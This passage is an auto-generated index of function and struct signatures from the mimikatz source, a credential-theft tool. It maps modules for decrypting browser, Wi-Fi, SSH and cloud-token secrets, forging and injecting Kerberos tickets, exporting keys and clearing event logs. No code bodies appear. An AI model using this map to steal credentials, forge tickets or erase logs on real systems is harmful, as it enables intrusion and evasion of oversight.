function NTSTATUS (line 555) | NTSTATUS kuhl_m_crypto_c_sc_auth(int argc, wchar_t * argv[])
function NTSTATUS (line 664) | NTSTATUS kuhl_m_crypto_c_pkiwi(int argc, wchar_t * argv[])
FILE: mimikatz/modules/crypto/kuhl_m_crypto_pki.h
type KIWI_KEY_INFO (line 12) | typedef struct _KIWI_KEY_INFO {
type KIWI_CERT_INFO (line 20) | typedef struct _KIWI_CERT_INFO {
type KIWI_CRL_INFO (line 36) | typedef struct _KIWI_CRL_INFO {
type KIWI_SIGNER (line 44) | typedef struct _KIWI_SIGNER {
FILE: mimikatz/modules/crypto/kuhl_m_crypto_sc.c
function DWORD (line 8) | DWORD kuhl_m_crypto_l_sc_provtypefromname(LPCWSTR szProvider)
function PWSTR (line 27) | PWSTR kuhl_m_crypto_l_sc_containerFromReader(LPCWSTR reader)
function BOOL (line 40) | BOOL kuhl_m_crypto_l_sc_prop_tlv_features(SCARDHANDLE hCard, DWORD ctlCode)
function kuhl_m_crypto_l_sc_prop (line 124) | void kuhl_m_crypto_l_sc_prop(SCARDCONTEXT hContext, LPCWSTR reader)
function NTSTATUS (line 213) | NTSTATUS kuhl_m_crypto_l_sc(int argc, wchar_t * argv[])
function LPVOID (line 318) | LPVOID WINAPI mdAlloc(__in SIZE_T Size)
function LPVOID (line 323) | LPVOID WINAPI mdReAlloc( __in LPVOID Address, __in SIZE_T Size)
function mdFree (line 328) | void WINAPI mdFree( __in LPVOID Address)
function DWORD (line 334) | DWORD WINAPI mdCacheAddFile(__in PVOID pvCacheContext, __in LPWSTR wszTa...
function DWORD (line 340) | DWORD WINAPI mdCacheLookupFile(__in PVOID pvCacheContext, __in LPWSTR ws...
function DWORD (line 346) | DWORD WINAPI mdCacheDeleteFile(__in PVOID pvCacheContext, __in LPWSTR ws...
function DWORD (line 352) | DWORD WINAPI mdPadData(__in PCARD_SIGNING_INFO pSigningInfo, __in DWORD...
function enuma (line 358) | void enuma(PCARD_DATA pData, LPCSTR dir)
function descblob (line 377) | void descblob(PUBLICKEYSTRUC *pk)
function kuhl_m_crypto_l_mdr (line 391) | void kuhl_m_crypto_l_mdr(LPCWSTR szMdr, SCARDCONTEXT ctxScard, SCARDHAND...
FILE: mimikatz/modules/dpapi/kuhl_m_dpapi.c
function NTSTATUS (line 38) | NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[])
function NTSTATUS (line 92) | NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[]) // no support ...
function NTSTATUS (line 149) | NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[])
function kuhl_m_dpapi_create_data (line 385) | void kuhl_m_dpapi_create_data(LPCWSTR sid, LPCGUID guid, LPCBYTE key, DW...
function NTSTATUS (line 442) | NTSTATUS kuhl_m_dpapi_create(int argc, wchar_t * argv[])
function NTSTATUS (line 558) | NTSTATUS kuhl_m_dpapi_credhist(int argc, wchar_t * argv[])
function BOOL (line 639) | BOOL kuhl_m_dpapi_unprotect_raw_or_blob(LPCVOID pDataIn, DWORD dwDataInL...
function kuhl_m_dpapi_display_MasterkeyInfosAndFree (line 733) | void kuhl_m_dpapi_display_MasterkeyInfosAndFree(LPCGUID guid, PVOID data...
function kuhl_m_dpapi_display_CredHist (line 758) | void kuhl_m_dpapi_display_CredHist(PKULL_M_DPAPI_CREDHIST_ENTRY entry, L...
FILE: mimikatz/modules/dpapi/kuhl_m_dpapi_oe.c
function PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY (line 14) | PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY kuhl_m_dpapi_oe_masterkey_get(LPCGUID g...
function BOOL (line 23) | BOOL kuhl_m_dpapi_oe_masterkey_add(LPCGUID guid, LPCVOID key, DWORD keyLen)
function kuhl_m_dpapi_oe_masterkey_delete (line 64) | void kuhl_m_dpapi_oe_masterkey_delete(PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY e...
function kuhl_m_dpapi_oe_masterkey_descr (line 77) | void kuhl_m_dpapi_oe_masterkey_descr(PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY en...
function kuhl_m_dpapi_oe_masterkeys_delete (line 91) | void kuhl_m_dpapi_oe_masterkeys_delete()
function kuhl_m_dpapi_oe_masterkeys_descr (line 101) | void kuhl_m_dpapi_oe_masterkeys_descr()
function PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY (line 108) | PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY kuhl_m_dpapi_oe_credential_get(LPCWSTR...
function BOOL (line 136) | BOOL kuhl_m_dpapi_oe_credential_copyEntryWithNewGuid(PKUHL_M_DPAPI_OE_CR...
function BOOL (line 145) | BOOL kuhl_m_dpapi_oe_credential_addtoEntry(PKUHL_M_DPAPI_OE_CREDENTIAL_E...
function BOOL (line 193) | BOOL kuhl_m_dpapi_oe_credential_add(LPCWSTR sid, LPCGUID guid, LPCVOID m...
function kuhl_m_dpapi_oe_credential_delete (line 221) | void kuhl_m_dpapi_oe_credential_delete(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY...
function kuhl_m_dpapi_oe_credential_descr (line 235) | void kuhl_m_dpapi_oe_credential_descr(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY ...
function kuhl_m_dpapi_oe_credentials_delete (line 269) | void kuhl_m_dpapi_oe_credentials_delete()
function kuhl_m_dpapi_oe_credentials_descr (line 279) | void kuhl_m_dpapi_oe_credentials_descr()
function PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY (line 286) | PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY kuhl_m_dpapi_oe_domainkey_get(LPCGUID g...
function BOOL (line 295) | BOOL kuhl_m_dpapi_oe_domainkey_add(LPCGUID guid, LPCVOID key, DWORD keyL...
function kuhl_m_dpapi_oe_domainkey_delete (line 324) | void kuhl_m_dpapi_oe_domainkey_delete(PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY e...
function kuhl_m_dpapi_oe_domainkey_descr (line 337) | void kuhl_m_dpapi_oe_domainkey_descr(PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY en...
function kuhl_m_dpapi_oe_domainkeys_delete (line 347) | void kuhl_m_dpapi_oe_domainkeys_delete()
function kuhl_m_dpapi_oe_domainkeys_descr (line 357) | void kuhl_m_dpapi_oe_domainkeys_descr()
function NTSTATUS (line 364) | NTSTATUS kuhl_m_dpapi_oe_clean()
function NTSTATUS (line 372) | NTSTATUS kuhl_m_dpapi_oe_cache(int argc, wchar_t * argv[])
function BOOL (line 409) | BOOL kuhl_m_dpapi_oe_is_sid_valid_ForCacheOrAuto(PSID sid, LPCWSTR szSid...
function BOOL (line 454) | BOOL kuhl_m_dpapi_oe_autosid(LPCWSTR filename, LPWSTR * pSid)
function BOOL (line 483) | BOOL kuhl_m_dpapi_oe_SaveToFile(LPCWSTR filename)
function BOOL (line 533) | BOOL kuhl_m_dpapi_oe_LoadFromFile(LPCWSTR filename)
FILE: mimikatz/modules/dpapi/kuhl_m_dpapi_oe.h
type KUHL_M_DPAPI_OE_MASTERKEY_ENTRY (line 11) | typedef struct _KUHL_M_DPAPI_OE_MASTERKEY_ENTRY {
type KUHL_M_DPAPI_OE_CREDENTIAL_ENTRY (line 20) | typedef struct _KUHL_M_DPAPI_OE_CREDENTIAL_ENTRY {
type KUHL_M_DPAPI_OE_DOMAINKEY_ENTRY (line 29) | typedef struct _KUHL_M_DPAPI_OE_DOMAINKEY_ENTRY {
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_chrome.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[])
function BOOL (line 104) | BOOL kuhl_m_dpapi_chrome_isTableExist(sqlite3 *pDb, const char *table)
function kuhl_m_dpapi_chrome_decrypt (line 128) | void kuhl_m_dpapi_chrome_decrypt(LPCVOID pData, DWORD dwData, BCRYPT_ALG...
function kuhl_m_dpapi_chrome_free_alg_key (line 163) | void kuhl_m_dpapi_chrome_free_alg_key(BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KE...
function BOOL (line 179) | BOOL kuhl_m_dpapi_chrome_alg_key_from_raw(BYTE key[AES_256_KEY_SIZE], BC...
function BOOL (line 214) | BOOL kuhl_m_dpapi_chrome_alg_key_from_b64(LPCWSTR base64, int argc, wcha...
function BOOL (line 245) | BOOL kuhl_m_dpapi_chrome_alg_key_from_file(LPCWSTR szState, BOOL forced,...
function BOOL (line 275) | BOOL kuhl_m_dpapi_chrome_alg_key_from_auto(LPCWSTR szFile, int argc, wch...
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
function NTSTATUS (line 9) | NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_cloudap.c
function NTSTATUS (line 11) | NTSTATUS kuhl_m_dpapi_cloudap_keyvalue_derived(int argc, wchar_t * argv[])
function PSTR (line 144) | PSTR basicEscapeJsonA(PCSTR toEscape)
function PSTR (line 169) | PSTR basicUnEscapeJsonA(PCSTR toUnEscape)
function PSTR (line 189) | PSTR generate_simpleHeader(PCSTR Alg, LPCBYTE Context, DWORD cbContext)
function PSTR (line 209) | PSTR generate_simplePayload(PCWSTR PrimaryRefreshToken, __time32_t *iat)
function PSTR (line 241) | PSTR generate_simpleSignature(LPCBYTE Context, DWORD cbContext, PCWSTR P...
function dealWithKey (line 288) | void dealWithKey(LPVOID pDataOut, DWORD dwDataOutLen)
function dealWithJwt (line 303) | void dealWithJwt(LPVOID pDataOut, DWORD dwDataOutLen)
function dealWithEntries (line 332) | void dealWithEntries(int argc, wchar_t * argv[], PKULL_M_REGISTRY_HANDLE...
function NTSTATUS (line 397) | NTSTATUS kuhl_m_dpapi_cloudap_fromreg(int argc, wchar_t * argv[])
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_creds.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_cred(int argc, wchar_t * argv[])
function NTSTATUS (line 63) | NTSTATUS kuhl_m_dpapi_vault(int argc, wchar_t * argv[])
function kuhl_m_dpapi_cred_tryEncrypted (line 164) | void kuhl_m_dpapi_cred_tryEncrypted(LPCWSTR target, LPCBYTE data, DWORD ...
function BOOL (line 218) | BOOL kuhl_m_dpapi_vault_key_type(PKULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE...
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_creds.h
type KUHL_M_DPAPI_ENCRYPTED_CRED (line 11) | typedef struct _KUHL_M_DPAPI_ENCRYPTED_CRED {
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_keys.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_keys_capi(int argc, wchar_t * argv[])
function BOOL (line 76) | BOOL kuhl_m_dpapi_keys_cng_isIso(PKULL_M_KEY_CNG_PROPERTY * properties, ...
function NTSTATUS (line 91) | NTSTATUS kuhl_m_dpapi_keys_cng(int argc, wchar_t * argv[])
function NTSTATUS (line 152) | NTSTATUS kuhl_m_dpapi_keys_tpm(int argc, wchar_t * argv[])
function kuhl_m_dpapi_keys_tpm_descr (line 205) | void kuhl_m_dpapi_keys_tpm_descr(LPCVOID data, DWORD dwData)
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_keys.h
type KUHL_M_DPAPI_KEYS_TPM_TLV (line 17) | typedef struct _KUHL_M_DPAPI_KEYS_TPM_TLV {
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_lunahsm.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_lunahsm(int argc, wchar_t * argv[])
function kuhl_m_dpapi_safenet_ksp_registryparser (line 57) | void kuhl_m_dpapi_safenet_ksp_registryparser(PKULL_M_REGISTRY_HANDLE hRe...
function kuhl_m_dpapi_safenet_ksp_registry_user_parser (line 104) | void kuhl_m_dpapi_safenet_ksp_registry_user_parser(PKULL_M_REGISTRY_HAND...
function kuhl_m_dpapi_safenet_ksp_entropy (line 143) | void kuhl_m_dpapi_safenet_ksp_entropy(IN LPCSTR identity, OUT BYTE entro...
function LPSTR (line 156) | LPSTR kuhl_m_dpapi_safenet_pk_password(IN LPCSTR server)
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_powershell.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_powershell(int argc, wchar_t * argv[])
function BOOL (line 37) | BOOL kuhl_m_dpapi_powershell_check_against_one_type(IXMLDOMNode *pObj, L...
function kuhl_m_dpapi_powershell_try_SecureString (line 75) | void kuhl_m_dpapi_powershell_try_SecureString(IXMLDOMNode *pObj, int arg...
function kuhl_m_dpapi_powershell_credential (line 108) | void kuhl_m_dpapi_powershell_credential(IXMLDOMNode *pObj, int argc, wch...
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_rdg.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_rdg(int argc, wchar_t * argv[])
function kuhl_m_dpapi_rdg_CredentialsProfile (line 34) | void kuhl_m_dpapi_rdg_CredentialsProfile(DWORD level, IXMLDOMNode *pNode...
function kuhl_m_dpapi_rdg_Groups (line 63) | void kuhl_m_dpapi_rdg_Groups(DWORD level, IXMLDOMNode *pNode, int argc, ...
function kuhl_m_dpapi_rdg_Servers (line 100) | void kuhl_m_dpapi_rdg_Servers(DWORD level, IXMLDOMNode *pNode, int argc,...
function kuhl_m_dpapi_rdg_LogonCredentials (line 135) | void kuhl_m_dpapi_rdg_LogonCredentials(DWORD level, IXMLDOMNode *pNode, ...
function kuhl_m_dpapi_rdg_Credentials (line 145) | void kuhl_m_dpapi_rdg_Credentials(DWORD level, IXMLDOMNode *pNode, int a...
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_sccm_networkaccessaccount(int argc, wchar_t * argv[])
function BOOL (line 134) | BOOL kuhl_m_dpapi_sccm_XML_Data_to_bin(BSTR szData, PSCCM_Policy_Secret ...
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.h
type SCCM_Policy_Secret (line 12) | typedef struct _SCCM_Policy_Secret {
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_ssh.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_ssh(int argc, wchar_t * argv[])
function kuhl_m_dpapi_ssh_keys4user (line 72) | void kuhl_m_dpapi_ssh_keys4user(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY ...
function BOOL (line 130) | BOOL CALLBACK kuhl_m_dpapi_ssh_impersonate(HANDLE hToken, DWORD ptid, PV...
function kuhl_m_dpapi_ssh_getKey (line 155) | void kuhl_m_dpapi_ssh_getKey(PKULL_M_REGISTRY_HANDLE hRegistry, HKEY hEn...
function BOOL (line 195) | BOOL kuhl_m_dpapi_ssh_getRSAfromRAW(LPCBYTE data, DWORD szData)
function kuhl_m_dpapi_ssh_ParseKeyElement (line 275) | void kuhl_m_dpapi_ssh_ParseKeyElement(PBYTE *pRaw, PBYTE *pData, DWORD *...
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_ssh.h
type KUHL_M_DPAPI_SSH_TOKEN (line 19) | typedef struct _KUHL_M_DPAPI_SSH_TOKEN{
type sshkey_types (line 25) | enum sshkey_types {
FILE: mimikatz/modules/dpapi/packages/kuhl_m_dpapi_wlan.c
function NTSTATUS (line 8) | NTSTATUS kuhl_m_dpapi_wifi(int argc, wchar_t * argv[])
function NTSTATUS (line 85) | NTSTATUS kuhl_m_dpapi_wwan(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos.c
function NTSTATUS (line 34) | NTSTATUS kuhl_m_kerberos_init()
function NTSTATUS (line 45) | NTSTATUS kuhl_m_kerberos_clean()
function NTSTATUS (line 50) | NTSTATUS LsaCallKerberosPackage(PVOID ProtocolSubmitBuffer, ULONG Submit...
function NTSTATUS (line 58) | NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
function BOOL (line 73) | BOOL CALLBACK kuhl_m_kerberos_ptt_directory(DWORD level, PCWCHAR fullpat...
function kuhl_m_kerberos_ptt_file (line 83) | void kuhl_m_kerberos_ptt_file(PCWCHAR filename)
function NTSTATUS (line 100) | NTSTATUS kuhl_m_kerberos_ptt_data(PVOID data, DWORD dataSize)
function NTSTATUS (line 129) | NTSTATUS kuhl_m_kerberos_purge(int argc, wchar_t * argv[])
function NTSTATUS (line 148) | NTSTATUS kuhl_m_kerberos_tgt(int argc, wchar_t * argv[])
function NTSTATUS (line 197) | NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[])
function NTSTATUS (line 269) | NTSTATUS kuhl_m_kerberos_ask(int argc, wchar_t * argv[])
function wchar_t (line 373) | wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICK...
function wchar_t (line 388) | wchar_t * kuhl_m_kerberos_generateFileName_short(PKIWI_KERBEROS_TICKET t...
function NTSTATUS (line 409) | NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
function NTSTATUS (line 551) | NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID ke...
function PBERVAL (line 583) | PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname...
function NTSTATUS (line 679) | NTSTATUS kuhl_m_kerberos_hash_data_raw(LONG keyType, PCUNICODE_STRING pS...
function NTSTATUS (line 700) | NTSTATUS kuhl_m_kerberos_hash_data(LONG keyType, PCUNICODE_STRING pStrin...
function NTSTATUS (line 715) | NTSTATUS kuhl_m_kerberos_hash(int argc, wchar_t * argv[])
function NTSTATUS (line 764) | NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos.h
type KUHL_M_KERBEROS_LIFETIME_DATA (line 16) | typedef struct _KUHL_M_KERBEROS_LIFETIME_DATA {
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos_ccache.c
function NTSTATUS (line 9) | NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL is...
function NTSTATUS (line 120) | NTSTATUS kuhl_m_kerberos_ccache_ptc(int argc, wchar_t * argv[])
function NTSTATUS (line 126) | NTSTATUS kuhl_m_kerberos_ccache_list(int argc, wchar_t * argv[])
function kuhl_m_kerberos_ccache_UnixTimeToFileTime (line 132) | void kuhl_m_kerberos_ccache_UnixTimeToFileTime(time_t t, LPFILETIME pft)
function BOOL (line 137) | BOOL kuhl_m_kerberos_ccache_unicode_string(PBYTE *data, PUNICODE_STRING ...
function BOOL (line 153) | BOOL kuhl_m_kerberos_ccache_externalname(PBYTE *data, PKERB_EXTERNAL_NAM...
function kuhl_m_kerberos_ccache_skip_buffer (line 174) | void kuhl_m_kerberos_ccache_skip_buffer(PBYTE *data)
function kuhl_m_kerberos_ccache_skip_struct_with_buffer (line 179) | void kuhl_m_kerberos_ccache_skip_struct_with_buffer(PBYTE *data)
function wchar_t (line 189) | wchar_t * kuhl_m_kerberos_ccache_generateFileName(const DWORD index, PKI...
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos_claims.c
function PCLAIMS_SET (line 8) | PCLAIMS_SET kuhl_m_kerberos_claims_createFromString(LPCWCHAR string)
function kuhl_m_kerberos_claims_free (line 69) | void kuhl_m_kerberos_claims_free(PCLAIMS_SET claimsSet)
function kuhl_m_kerberos_claims_displayClaimsSet (line 101) | void kuhl_m_kerberos_claims_displayClaimsSet(PCLAIMS_SET claimsSet)
function BOOL (line 136) | BOOL kuhl_m_kerberos_claims_encode_ClaimsSet(PCLAIMS_SET claimsSet, PVOI...
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos_pac.c
function BOOL (line 8) | BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationIn...
function NTSTATUS (line 84) | NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, LONG Si...
function BOOL (line 130) | BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PFILETIME authtime, LPCWST...
function PKERB_VALIDATION_INFO (line 146) | PKERB_VALIDATION_INFO kuhl_m_pac_infoToValidationInfo(PFILETIME authtime...
function BOOL (line 180) | BOOL kuhl_m_pac_stringToGroups(PCWSTR szGroups, PGROUP_MEMBERSHIP *group...
function BOOL (line 217) | BOOL kuhl_m_pac_stringToSids(PCWSTR szSids, PKERB_SID_AND_ATTRIBUTES *si...
function NTSTATUS (line 253) | NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos_pac.h
type PAC_SIGNATURE_DATA (line 16) | typedef struct _PAC_SIGNATURE_DATA {
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos_ticket.c
function kuhl_m_kerberos_ticket_display (line 8) | void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL w...
function kuhl_m_kerberos_ticket_displayFlags (line 49) | void kuhl_m_kerberos_ticket_displayFlags(ULONG flags)
function kuhl_m_kerberos_ticket_displayExternalName (line 57) | void kuhl_m_kerberos_ticket_displayExternalName(IN LPCWSTR prefix, IN PK...
function BOOL (line 73) | BOOL kuhl_m_kerberos_ticket_isLongFilename(PKIWI_KERBEROS_TICKET ticket)
function PCWCHAR (line 78) | PCWCHAR kuhl_m_kerberos_ticket_etype(LONG eType)
function PCWCHAR (line 110) | PCWCHAR kuhl_m_kerberos_ticket_ctype(LONG cType)
function kuhl_m_kerberos_ticket_freeTicket (line 141) | void kuhl_m_kerberos_ticket_freeTicket(PKIWI_KERBEROS_TICKET ticket)
function PKERB_EXTERNAL_NAME (line 158) | PKERB_EXTERNAL_NAME kuhl_m_kerberos_ticket_copyExternalName(PKERB_EXTERN...
function kuhl_m_kerberos_ticket_freeExternalName (line 179) | void kuhl_m_kerberos_ticket_freeExternalName(PKERB_EXTERNAL_NAME pName)
function kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer (line 190) | void kuhl_m_kerberos_ticket_freeKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER...
function PBERVAL (line 196) | PBERVAL kuhl_m_kerberos_ticket_createAppKrbCred(PKIWI_KERBEROS_TICKET ti...
function PBERVAL (line 250) | PBERVAL kuhl_m_kerberos_ticket_createAppEncTicketPart(PKIWI_KERBEROS_TIC...
function kuhl_m_kerberos_ticket_createSequencePrimaryName (line 294) | void kuhl_m_kerberos_ticket_createSequencePrimaryName(BerElement * pBer,...
function kuhl_m_kerberos_ticket_createSequenceEncryptedData (line 304) | void kuhl_m_kerberos_ticket_createSequenceEncryptedData(BerElement * pBe...
function kuhl_m_kerberos_ticket_createSequenceEncryptionKey (line 312) | void kuhl_m_kerberos_ticket_createSequenceEncryptionKey(BerElement * pBe...
FILE: mimikatz/modules/kerberos/kuhl_m_kerberos_ticket.h
type KIWI_KERBEROS_BUFFER (line 74) | typedef struct _KIWI_KERBEROS_BUFFER {
type KIWI_KERBEROS_TICKET (line 79) | typedef struct _KIWI_KERBEROS_TICKET {
FILE: mimikatz/modules/kuhl_m.h
type NTSTATUS (line 9) | typedef NTSTATUS (* PKUHL_M_C_FUNC) (int argc, wchar_t * args[]);
type NTSTATUS (line 10) | typedef NTSTATUS (* PKUHL_M_C_FUNC_INIT) ();
type KUHL_M_C (line 12) | typedef struct _KUHL_M_C {
type KUHL_M (line 18) | typedef struct _KUHL_M {
FILE: mimikatz/modules/kuhl_m_acr.c
function NTSTATUS (line 25) | NTSTATUS kuhl_m_acr_init()
function NTSTATUS (line 32) | NTSTATUS kuhl_m_acr_clean()
function NTSTATUS (line 38) | NTSTATUS kuhl_m_acr_open(int argc, wchar_t * argv[])
function NTSTATUS (line 62) | NTSTATUS kuhl_m_acr_close(int argc, wchar_t * argv[])
function NTSTATUS (line 75) | NTSTATUS kuhl_m_acr_firmware(int argc, wchar_t * argv[])
function NTSTATUS (line 102) | NTSTATUS kuhl_m_acr_info(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_busylight.c
function NTSTATUS (line 43) | NTSTATUS kuhl_m_busylight_init()
function NTSTATUS (line 58) | NTSTATUS kuhl_m_busylight_clean()
function NTSTATUS (line 64) | NTSTATUS kuhl_m_busylight_off(int argc, wchar_t * argv[])
function NTSTATUS (line 73) | NTSTATUS kuhl_m_busylight_status(int argc, wchar_t * argv[])
function NTSTATUS (line 120) | NTSTATUS kuhl_m_busylight_list(int argc, wchar_t * argv[])
function NTSTATUS (line 142) | NTSTATUS kuhl_m_busylight_single(int argc, wchar_t * argv[])
function BUSYLIGHT_COLOR (line 165) | BUSYLIGHT_COLOR adaptColor(PCBUSYLIGHT_COLOR color, BYTE percent)
function DWORD (line 181) | DWORD WINAPI kuhl_m_busylight_gradientThread(LPVOID lpThreadParameter)
function NTSTATUS (line 233) | NTSTATUS kuhl_m_busylight_test(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_crypto.c
function NTSTATUS (line 34) | NTSTATUS kuhl_m_crypto_init()
function NTSTATUS (line 46) | NTSTATUS kuhl_m_crypto_clean()
function NTSTATUS (line 57) | NTSTATUS kuhl_m_crypto_l_providers(int argc, wchar_t * argv[])
function NTSTATUS (line 123) | NTSTATUS kuhl_m_crypto_l_stores(int argc, wchar_t * argv[])
function BOOL (line 137) | BOOL WINAPI kuhl_m_crypto_l_stores_enumCallback_print(const void *pvSyst...
function kuhl_m_crypto_certificate_descr (line 143) | void kuhl_m_crypto_certificate_descr(PCCERT_CONTEXT pCertContext)
function NTSTATUS (line 193) | NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[])
function kuhl_m_crypto_l_keys_capi (line 309) | void kuhl_m_crypto_l_keys_capi(LPCWSTR szContainer, LPCWSTR szProvider, ...
function kuhl_m_crypto_l_keys_cng (line 376) | void kuhl_m_crypto_l_keys_cng(LPCWSTR szContainer, LPCWSTR szProvider, D...
function NTSTATUS (line 418) | NTSTATUS kuhl_m_crypto_l_keys(int argc, wchar_t * argv[])
function kuhl_m_crypto_printKeyInfos (line 458) | void kuhl_m_crypto_printKeyInfos(NCRYPT_KEY_HANDLE hCNGKey, HCRYPTKEY hC...
function kuhl_m_crypto_exportRawKeyToFile (line 553) | void kuhl_m_crypto_exportRawKeyToFile(LPCVOID data, DWORD size, BOOL isC...
function kuhl_m_crypto_exportKeyToFile (line 608) | void kuhl_m_crypto_exportKeyToFile(NCRYPT_KEY_HANDLE hCngKey, HCRYPTKEY ...
function kuhl_m_crypto_exportCert (line 726) | void kuhl_m_crypto_exportCert(PCCERT_CONTEXT pCertificate, BOOL havePriv...
function wchar_t (line 762) | wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wc...
function NTSTATUS (line 777) | NTSTATUS kuhl_m_crypto_hash(int argc, wchar_t * argv[])
function BOOL (line 841) | BOOL kuhl_m_crypto_system_data(PBYTE data, DWORD len, PCWCHAR originalNa...
function BOOL (line 905) | BOOL CALLBACK kuhl_m_crypto_system_directory(DWORD level, PCWCHAR fullpa...
function NTSTATUS (line 921) | NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
function kuhl_m_crypto_file_rawData (line 939) | void kuhl_m_crypto_file_rawData(PKUHL_M_CRYPTO_CERT_PROP prop, PCWCHAR i...
function NTSTATUS (line 987) | NTSTATUS kuhl_m_crypto_c_cert_to_hw(int argc, wchar_t * argv[])
function BOOL (line 1153) | BOOL kuhl_m_crypto_FreeHandleCert(HCERTSTORE *hStore, PCCERT_CONTEXT *pC...
function BOOL (line 1170) | BOOL kuhl_m_crypto_ImportCert(LPCVOID data, DWORD dwSize, HCERTSTORE *hS...
function BOOL (line 1191) | BOOL kuhl_m_crypto_NCrypt_KeyFromMagic(LPCVOID key, DWORD size, NCRYPT_P...
function BOOL (line 1274) | BOOL kuhl_m_crypto_NCrypt_AutoKey(LPCVOID key, DWORD size, NCRYPT_PROV_H...
function BOOL (line 1345) | BOOL kuhl_m_crypto_keyutil_export_pkcs8_file(NCRYPT_KEY_HANDLE hNCryptKe...
function NTSTATUS (line 1378) | NTSTATUS kuhl_m_crypto_keyutil(int argc, wchar_t * argv[])
function NTSTATUS (line 1437) | NTSTATUS kuhl_m_crypto_platforminfo(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_crypto.h
type KUHL_M_CRYPTO_DWORD_TO_DWORD (line 18) | typedef struct _KUHL_M_CRYPTO_DWORD_TO_DWORD {
type KUHL_M_CRYPTO_NAME_TO_REALNAME (line 23) | typedef struct _KUHL_M_CRYPTO_NAME_TO_REALNAME {
type KUHL_M_CRYPTO_CRYPT_KEY_PROV_INFO (line 28) | typedef struct _KUHL_M_CRYPTO_CRYPT_KEY_PROV_INFO {
type KUHL_M_CRYPTO_CERT_PROP (line 38) | typedef struct _KUHL_M_CRYPTO_CERT_PROP {
type KUHL_M_CRYPTO_NCRYPT_GROUP_TO_EXPORT (line 45) | typedef struct _KUHL_M_CRYPTO_NCRYPT_GROUP_TO_EXPORT {
FILE: mimikatz/modules/kuhl_m_dpapi.c
function NTSTATUS (line 16) | NTSTATUS kuhl_m_dpapi_masterkeys(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_event.c
function NTSTATUS (line 77) | NTSTATUS kuhl_m_event_drop(int argc, wchar_t * argv[])
function NTSTATUS (line 83) | NTSTATUS kuhl_m_event_clear(int argc, wchar_t * argv[])
FILE: mimikatz/modules/kuhl_m_iis.c
function NTSTATUS (line 17) | NTSTATUS kuhl_m_iis_apphost(int argc, wchar_t * argv[])
